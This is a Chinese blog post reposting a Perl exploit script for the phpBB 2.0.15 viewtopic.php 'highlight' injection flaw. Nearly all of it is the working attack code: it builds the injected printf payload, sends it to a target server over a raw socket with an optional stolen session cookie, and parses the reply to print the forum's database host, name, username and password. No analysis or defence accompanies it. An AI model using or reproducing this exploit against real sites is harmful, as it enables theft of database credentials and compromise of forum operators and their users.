ITPub博客

首页 > 应用开发 > IT综合 > phpBB 2.0.15 (highlight) Database Authentication Details Exploit

phpBB 2.0.15 (highlight) Database Authentication Details Exploit

原创 IT综合 作者:coolwinds 时间:2005-07-04 09:13:25 0 删除 编辑

phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability This exploit gives the user all the details about the database connection such as database host, username, password and databasename. Written by SecureD, gvr.secured@gmail.com,2005

Greetings to GvR, Jumento, PP, CKrew & friends

[@more@]

#!/usr/bin/perl

# tested and working /str0ke

# ********************************************************************
# **********************************************************************
# **** **
# *** ****** ******************* **
# *** *** **** *********************** **
# *** *** **** **** * *** ***** **
# *** *** *** *** *** * ** ** ** **
# *** *** *** ** ** ** ** **
#*** *** *** *** ** ** ***** **
#** *** *** **** ** ** ** **
#** *** *** *** ******* ******* ** *** ** **
#** *** *** *** ** *** *** ** ** ** ** **
#** *** *** *** ** *** *** *** ***** **
#** *** *** *** ** *** *** **
#** **** *** **** *** *** **
#** ******* **** ******** *********************************** **
#** *** **
#** *** **
#** **
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
#** This exploit gives the user all the details about the database **
#** connection such as database host, username, password and **
#** database name. **
#** **
#** Written by SecureD, gvr.securedgmailcom,2005 **
#** **
#** Greetings to GvR, Jumento, PP, CKrew & friends **
#** **
#*****************************************************************************
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+rn";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |rn";
print "| By SecureD gvr.securedgmailcom |rn";
print "+-----------------------------------------------------------------------+rn";

if (@ARGV < 3)
{
print "Usage:rn";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRINGrnrn";
print "SERVER - Server where PhpBB is installed.rn";
print "DIR - PHPBB directory or / for no directory.rn";
print "THREADID - Id of an existing thread.rn";
print "COOKIESTRING - Optional, cookie string of the http request.rn";
print " Use this when a thread needs authentication for viewingrn";
print " You can use Firefox in combination with "Live HTTPrn";
print " Headers" to get this cookiestring.rnrn";
print "Example 1 (with cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09" rnrn";
print "Example 2 (without cookiestring):rn";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 rn";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:////ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "$dbhost.";
$sploit .= "$delimit.";
$sploit .= "$dbname.";
$sploit .= "$delimit.";
$sploit .= "$dbuser.";
$sploit .= "$delimit.";
$sploit .= "$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.nn";

print "[+] Connecting OKn";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1rn";
print $sock "Host: $servrn";
if ( defined $cookie) {
print $sock "Cookie: $cookie rn";
}
print $sock "Connection: closernrn";


$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OKn";
sleep(1);
print "[+] Database Host: " . $array[0] . "n";
sleep(1);
print "[+] Database Name: " . $array[1] . "n";
sleep(1);
print "[+] Username: " . $array[2] . "n";
sleep(1);
print "[+] Password: " . $array[3] . "n";
sleep(1);
} else {
print "FAILEDn";
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801584/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947479